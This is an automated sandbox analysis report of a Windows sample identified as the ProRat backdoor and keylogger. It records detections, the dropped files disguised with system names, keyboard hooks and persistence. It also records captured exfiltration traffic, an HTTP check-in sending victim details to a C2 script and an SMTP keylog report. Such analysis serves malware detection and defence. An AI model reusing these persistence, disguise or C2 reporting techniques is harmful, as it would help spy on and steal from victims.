Edit tour

Windows Analysis Report
7b8wRbnmKu.exe

Overview

General Information

Sample Name:	7b8wRbnmKu.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	24cb55a207a9eb0047a6acf94c92ea7eac1540e6cece817915e6594887318961
Analysis ID:	890233
MD5:	e39b8c5521c7df36ee92ead621a58ed9
SHA1:	c438abeca3808df05a4d8b33a2e5ae950cf7faf6
SHA256:	24cb55a207a9eb0047a6acf94c92ea7eac1540e6cece817915e6594887318961
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Installs a global keyboard hook

PE file has a writeable .text section

Contains functionalty to change the wallpaper

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Uses dynamic DNS services

Drops PE files with benign system names

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to enumerate running services

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

Drops PE files

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Uses SMTP (mail sending)

Detected non-DNS traffic on DNS port

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to detect sandboxes (mouse cursor move detection)

Found large amount of non-executed APIs

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

7b8wRbnmKu.exe (PID: 5676 cmdline: C:\Users\user\Desktop\7b8wRbnmKu.exe MD5: E39B8C5521C7DF36EE92EAD621A58ED9)

lncom.exe (PID: 7348 cmdline: "C:\Windows\system32\lncom.exe" MD5: B0692CE1EEE360FD4F246BDA4355BCFF)

fservice.exe (PID: 7496 cmdline: C:\Windows\system32\fservice.exe MD5: B0692CE1EEE360FD4F246BDA4355BCFF)

services.exe (PID: 7544 cmdline: C:\Windows\services.exe -XP MD5: B0692CE1EEE360FD4F246BDA4355BCFF)

cmd.exe (PID: 7476 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\7B8WRB~1.EXE.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Snort Signatures

ETPRO TROJAN Prorat.19.i Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.3188.114.97.749700802803278 06/19/23-11:19:14.587143
SID:	2803278
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN ProRat Keylogger Infection Report via Email - Source IP: 192.168.2.3 - Destination IP: 67.195.204.79

Timestamp:	192.168.2.367.195.204.7949703252802174 06/19/23-11:19:15.552596
SID:	2802174
Source Port:	49703
Destination Port:	25
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 7b8wRbnmKu.exe	ReversingLabs: Detection: 94%
Source: 7b8wRbnmKu.exe	Virustotal: Detection: 85%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: 7b8wRbnmKu.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\lncom.exe	Avira: detection malicious, Label: BDS/ProRat.Gen
Source: C:\Windows\SysWOW64\winkey.dll	Avira: detection malicious, Label: TR/Spy.ProAgen.20.E
Source: C:\Windows\System\sservice.exe	Avira: detection malicious, Label: BDS/ProRat.Gen
Source: C:\Windows\SysWOW64\reginv.dll	Avira: detection malicious, Label: BDS/Probat.B.77.A
Source: C:\Windows\services.exe	Avira: detection malicious, Label: BDS/ProRat.Gen
Source: C:\Windows\SysWOW64\fservice.exe	Avira: detection malicious, Label: BDS/ProRat.Gen

Multi AV Scanner detection for dropped file

Source: C:\Windows\SysWOW64\fservice.exe	ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\lncom.exe	ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\reginv.dll	ReversingLabs: Detection: 88%
Source: C:\Windows\SysWOW64\winkey.dll	ReversingLabs: Detection: 88%
Source: C:\Windows\System\sservice.exe	ReversingLabs: Detection: 96%
Source: C:\Windows\services.exe	ReversingLabs: Detection: 96%

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\lncom.exe	Joe Sandbox ML: detected
Source: C:\Windows\System\sservice.exe	Joe Sandbox ML: detected
Source: C:\Windows\services.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\fservice.exe	Joe Sandbox ML: detected

Source: 7b8wRbnmKu.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00494BD0 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	4_2_00494BD0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0048B4A8 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	4_2_0048B4A8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0048B584 FindFirstFileA,GetLastError,	4_2_0048B584

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4x nop then les edi, eax

4_2_004410A4

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2803278 ETPRO TROJAN Prorat.19.i Checkin 192.168.2.3:49700 -> 188.114.97.7:80
Source: Traffic	Snort IDS: 2802174 ETPRO TROJAN ProRat Keylogger Infection Report via Email 192.168.2.3:49703 -> 67.195.204.79:25

Uses dynamic DNS services

Source: unknown

DNS query: name: you.no-ip.com

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7
Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7

Source: global traffic	HTTP traffic detected: GET http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-18&serversaati=11:19:43_AM&servertarihi=6/19/2023&serversifre=123&islem=log HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, /Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: www.yoursite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /Referer: http://www.icq.com/friendship/pages/send_by_email_18984.phpAccept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.icq.comConnection: Keep-AliveCookie: geo=359; adsPopup0=1098232990103

Source: global traffic

TCP traffic: 192.168.2.3:49703 -> 67.195.204.79:25

Source: global traffic

TCP traffic: 192.168.2.3:49701 -> 8.8.8.8:53

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 19 Jun 2023 09:19:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WLK7o68VOp69nP8Nhmk9ynQJdyj%2FOS6ImMdFUmgaDSfgJKoQjUP3xTSYJ7Zhg06s5B9rClo3t8zYHpJVnvLbUa%2B%2Fm0MM9vAlGFF0p%2F4U0Ucxvl1B04%2BYhNYfwOdM4pSkArU0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 7d9ab07429d39a0b-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dd 59 6b 93 a2 c8 b6 fd 3e bf 82 53 27 e2 58 1d 3d 94 3c 44 a5 a6 9d 09 54 7c a0 80 02 22 70 e7 86 91 40 02 c9 5b 9e e2 89 f9 ef 37 ac ea Data Ascii: fceYk>S'X=<DT|"p@[7

Source: lncom.exe, lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp, services.exe, 00000008.00000002.620395892.0000000004789000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.icq.com/friendship/pages/send_by_email_18984.php
Source: lncom.exe	String found in binary or memory: http://www.icq.com/friendship/pages/send_by_email_18984.phpAccept-Language:
Source: lncom.exe, lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.rsac.org/ratingsv01.html
Source: lncom.exe, 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.rsac.org/ratingsv01.htmlvsln
Source: services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursite.com/cgi-bin/prorat.cgi
Source: services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=___L
Source: services.exe, 00000008.00000002.620395892.0000000004789000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=511
Source: services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresiX
Source: services.exe, 00000008.00000002.620299094.0000000002800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresiXW
Source: services.exe, 00000008.00000002.620395892.0000000004789000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://postmaster.yahooinc.com/error-codes

Source: unknown

DNS traffic detected: queries for: you.no-ip.com

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0043233C @Wsocket@WSocket_recv$qqripvii,@Wsocket@WSocketGetProc$qqrx17System@AnsiString,

4_2_0043233C

Source: global traffic	HTTP traffic detected: GET http://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=______&ipadresi=192.168.2.3&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-18&serversaati=11:19:43_AM&servertarihi=6/19/2023&serversifre=123&islem=log HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, /Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: www.yoursite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /Referer: http://www.icq.com/friendship/pages/send_by_email_18984.phpAccept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.icq.comConnection: Keep-AliveCookie: geo=359; adsPopup0=1098232990103

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\services.exe	Windows user hook set: 0 keyboard C:\Windows\system32\winkey.dll			Jump to behavior
Source: C:\Windows\services.exe	Windows user hook set: 0 computer based training C:\Windows\system32\reginv.dll			Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0045F618 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

4_2_0045F618

Source: 7b8wRbnmKu.exe, 00000000.00000002.358132555.000000000062A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_00479380 NtdllDefWindowProc_A,GetCapture,GetKeyboardState,

4_2_00479380

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0040E25C SystemParametersInfoA,SystemParametersInfoA,

4_2_0040E25C

System Summary

PE file has a writeable .text section

Source: 7b8wRbnmKu.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 7b8wRbnmKu.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\fservice.exe

File deleted: C:\Windows\System\sservice.exe

Jump to behavior

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

File created: C:\Windows\SysWOW64\lncom.exe

Jump to behavior

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Code function: 0_2_004011B0	0_2_004011B0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00406020	4_2_00406020
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0049A0A0	4_2_0049A0A0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004B61E8	4_2_004B61E8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004B0198	4_2_004B0198
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00458658	4_2_00458658
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004B6714	4_2_004B6714
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004051CC	4_2_004051CC

Source: C:\Windows\SysWOW64\lncom.exe	Code function: String function: 004A4AD0 appears 46 times
Source: C:\Windows\SysWOW64\lncom.exe	Code function: String function: 004A1565 appears 55 times
Source: C:\Windows\SysWOW64\lncom.exe	Code function: String function: 0048C0E0 appears 39 times
Source: C:\Windows\SysWOW64\lncom.exe	Code function: String function: 0049F19C appears 66 times
Source: C:\Windows\SysWOW64\lncom.exe	Code function: String function: 00493730 appears 66 times
Source: C:\Windows\SysWOW64\lncom.exe	Code function: String function: 004A44EC appears 559 times

Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004327B8 GetWindowLongA,@Wsocket@TCustomWSocket@,NtdllDefWindowProc_A,	4_2_004327B8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0046D7B8 NtdllDefWindowProc_A,	4_2_0046D7B8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0044220C @Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage,@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage,NtdllDefWindowProc_A,	4_2_0044220C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0047047C NtdllDefWindowProc_A,	4_2_0047047C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00458658 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	4_2_00458658
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00432678 @Wsocket@TCustomWSocket@WndProc$qqrr17Messages@TMessage,@Wsocket@TCustomWSocket@WMASyncSelect$qqrr17Messages@TMessage,@Wsocket@TCustomWSocket@WMAsyncGetHostByName$qqrr17Messages@TMessage,@Wsocket@TCustomWSocket@WMAsyncGetHostByAddr$qqrr17Messages@TMessage,@Wsocket@TCustomWSocket@WMCloseDelayed$qqrr17Messages@TMessage,@Wsocket@TCustomWSocket@WMRelease$qqrr17Messages@TMessage,@Wsocket@ESocketException@,NtdllDefWindowProc_A,	4_2_00432678
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0043A784 @Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage,@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage,@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage,@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage,@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage,NtdllDefWindowProc_A,	4_2_0043A784
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00487158 RtlEnterCriticalSection,RtlLeaveCriticalSection,NtdllDefWindowProc_A,	4_2_00487158
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00479380 NtdllDefWindowProc_A,GetCapture,GetKeyboardState,	4_2_00479380

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_004088E4 OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,ControlService,CloseServiceHandle,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,

4_2_004088E4

Source: 7b8wRbnmKu.exe	ReversingLabs: Detection: 94%
Source: 7b8wRbnmKu.exe	Virustotal: Detection: 85%

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

File read: C:\Users\user\Desktop\7b8wRbnmKu.exe

Jump to behavior

Source: 7b8wRbnmKu.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7b8wRbnmKu.exe C:\Users\user\Desktop\7b8wRbnmKu.exe
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Process created: C:\Windows\SysWOW64\lncom.exe "C:\Windows\system32\lncom.exe"
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\7B8WRB~1.EXE.bat
Source: C:\Windows\SysWOW64\lncom.exe	Process created: C:\Windows\SysWOW64\fservice.exe C:\Windows\system32\fservice.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\fservice.exe	Process created: C:\Windows\services.exe C:\Windows\services.exe -XP
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Process created: C:\Windows\SysWOW64\lncom.exe "C:\Windows\system32\lncom.exe"	Jump to behavior
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\7B8WRB~1.EXE.bat	Jump to behavior
Source: C:\Windows\SysWOW64\lncom.exe	Process created: C:\Windows\SysWOW64\fservice.exe C:\Windows\system32\fservice.exe	Jump to behavior
Source: C:\Windows\SysWOW64\fservice.exe	Process created: C:\Windows\services.exe C:\Windows\services.exe -XP	Jump to behavior

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

File created: C:\Users\user\Desktop\7b8wRbnmKu.jpg

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@11/9@5/3

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0040D564 SetLastError,SetErrorMode,GetDiskFreeSpaceA,GetLastError,

4_2_0040D564

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_0045CCB4 GetLastError,FormatMessageA,

4_2_0045CCB4

Source: C:\Windows\SysWOW64\lncom.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\fservice.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\services.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_004085C4 OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,CharLowerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

4_2_004085C4

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_004124A0 CreateToolhelp32Snapshot,Process32First,CharLowerA,Process32Next,CloseHandle,

4_2_004124A0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_01

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_00481F40 FindResourceA,

4_2_00481F40

Source: C:\Users\user\Desktop\7b8wRbnmKu.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\Desktop\7B8WRB~1.EXE.bat

Source: C:\Windows\services.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\services.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\services.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\services.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\services.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\services.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0045210C push 0045214Fh; ret	4_2_00452147
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004803E4 push 00480410h; ret	4_2_00480408
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0048041C push 00480454h; ret	4_2_0048044C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00488554 push 00488607h; ret	4_2_004885FF
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0046277C push 0046284Ch; ret	4_2_00462844
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00476780 push ecx; mov dword ptr [esp], ecx	4_2_00476784
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004B8810 push 004B884Eh; ret	4_2_004B8846
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004B8918 push 004B8944h; ret	4_2_004B893C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00448A00 push 00448A2Ch; ret	4_2_00448A24
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00470BFC push 00470C28h; ret	4_2_00470C20
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00488DD4 push 00488E00h; ret	4_2_00488DF8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00470E2C push 00470E85h; ret	4_2_00470E7D
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00440FC8 push 00441015h; ret	4_2_0044100D
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00452FF0 push 00453028h; ret	4_2_00453020
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00450F80 push 00450FACh; ret	4_2_00450FA4
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0040106C push 00000BADh; ret	4_2_00401078
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004AD0FC push ecx; mov dword ptr [esp], edx	4_2_004AD104
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004890F4 push 00489120h; ret	4_2_00489118
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00459134 push 0045919Fh; ret	4_2_00459197
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00489134 push 00489160h; ret	4_2_00489158
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00489184 push 004891B0h; ret	4_2_004891A8
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004891BC push 004891E8h; ret	4_2_004891E0
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0048B1B4 push ecx; mov dword ptr [esp], edx	4_2_0048B1B9
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00489264 push ecx; mov dword ptr [esp], eax	4_2_00489265
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0044720C push 00447244h; ret	4_2_0044723C
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00401288 push 004012B4h; ret	4_2_004012AC
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_00495370 push 004953D5h; ret	4_2_004953CD
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004953D8 push 004954C7h; ret	4_2_004954BF
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004473DC push 00447408h; ret	4_2_00447400
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_0044D3E0 push 0044D40Ch; ret	4_2_0044D404
Source: C:\Windows\SysWOW64\lncom.exe	Code function: 4_2_004893F4 push 00489420h; ret	4_2_00489418

Source: reginv.dll.8.dr

Static PE information: section name: .HookSec

Source: C:\Windows\SysWOW64\lncom.exe

Code function: 4_2_00418B3C LoadLibraryA,GetProcAddress,GetCurrentProcessId,

4_2_00418B3C

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\lncom.exe	Executable created and started: C:\Windows\SysWOW64\fservice.exe	Jump to behavior
Source: C:\Windows\SysWOW64\fservice.exe	Executable created and started: C:\Windows\services.exe	Jump to behavior
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	Executable created and started: C:\Windows\SysWOW64\lncom.exe	Jump to behavior

Drops PE files with benign system names

Source: C:\Windows\SysWOW64\fservice.exe

File created: C:\Windows\services.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\lncom.exe	File created: C:\Windows\SysWOW64\fservice.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\lncom.exe	File created: C:\Windows\System\sservice.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\fservice.exe	File created: C:\Windows\services.exe	Jump to dropped file
Source: C:\Windows\services.exe	File created: C:\Windows\SysWOW64\reginv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	File created: C:\Windows\SysWOW64\lncom.exe	Jump to dropped file
Source: C:\Windows\services.exe	File created: C:\Windows\SysWOW64\winkey.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\lncom.exe	File created: C:\Windows\SysWOW64\fservice.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\lncom.exe	File created: C:\Windows\System\sservice.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\fservice.exe	File created: C:\Windows\services.exe	Jump to dropped file
Source: C:\Windows\services.exe	File created: C:\Windows\SysWOW64\reginv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7b8wRbnmKu.exe	File created: C:\Windows\SysWOW64\lncom.exe	Jump to dropped file
